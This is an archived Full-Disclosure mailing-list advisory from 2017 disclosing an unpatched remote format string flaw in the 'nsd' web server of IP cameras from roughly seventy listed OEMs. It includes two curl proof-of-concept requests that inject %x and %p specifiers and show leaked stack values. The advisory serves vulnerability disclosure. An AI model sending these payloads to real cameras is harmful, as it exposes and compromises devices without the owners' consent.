lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <8DD925D8-5BFD-4C8A-BA72-B259C142CD23@noemail.eu>
Date: Fri, 15 Dec 2017 00:40:41 +0000
From: bashis <mcw@...mail.eu>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] 0-day: Remote Stack Format String in 'nsd' binary from
	multiple OEM

[STX]

Subject: Remote Stack Format String in 'nsd' binary from multiple OEM

Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 14, 2017
Full Disclosure: 0-Day


-[ PoC ]-

1)
$ curl 'http://[IP:PORT]/main/index.asp?ID=AAAA|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x&lg=BBBB'

[...]
	 function initHideWidget(){
	 document.getElementById("devip").value = "192.168.57.20";
	 document.getElementById("cameraid").value = 1;
	 document.getElementById("streamid").value = 1;
	 document.getElementById("id").value = "AAAA|5e2ff9f8|ffffffff|5e3006db|ea60|1|2|1|1|0|20cd3e0|7263733c|20747069";
	 document.getElementById("lg").value = "BBBB";
	 document.getElementById("port").value = 60000;
	 document.getElementById("ipver").value = 1;
	 document.getElementById("tprotocol").value = 2;
	 document.getElementById("devtype").value = 1;
	 document.getElementById("ismotorize").value = 1;

[...]
Note: 'BBBB' are hiding within '5e3006db'

2)
curl -v "http://[IP:PORT]/Maintain/upgrade.asp?ID=|%p|%p|%p|%p|%p|%p"
[...]
	 function initHideWidget(){
	 document.getElementById("ip").value = "192.168.57.20";
	 document.getElementById("id").value = "|0x5d300484|0xffffffff|0xea60|0x1|0x2|0x1";
	 document.getElementById("port").value = 60000;
	 document.getElementById("ipver").value = 1;
	 document.getElementById("tprotocol").value = 2;
	 document.getElementById("devtype").value = 1;
[...]


-[ Affected OEM ]-

Huatu
I-View
IP Camera Web Service
Stanley Security
3D Eyes CCTV Platform
Protech Srl
LS vision 
GWSECU
12 Legion Solution
HDVuk IP Camera
Intervid Security
Suzuki Tech
Wellsite IP Camera
iBrido
Protec IP Camera
Maxtron IP Camera
Ascendent
GTvs IP Camera
Squilla
Bikal IP Camera
MW Power
Alfa Vision
KMA Security
Tough Dog Security
Kpro HQ
Lanetwork
AFM Vision
ZetaDo
Jobsight Inc.
Datalab IP Technologies
4Tvision
Proline UK
Tanz
Aisonic
HD-IP
PreSec Security Solution
EagleVision
Elemis Delta
Imenara
Gigamedia
Xavee
Honeywell
Boss Security
A.R.T Surveillance
Global Security
Securicorp
Securetech
Vapplica
Star
Stic
NeXus
Alnet
Spy Smart
Kompsos
Adler Security Systems
Nextan
Access
Toprotect
Kawah
LS StrateX
Senpei CCTV
Metcom
AFM Vision
Doron Technologies
Saviour Smart IoT Systems
Eagle-Eye
Faucon.at
BlueEagle Security
Campro
Opple
Level One
Video and Monitor System
K&D

[ETX]



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ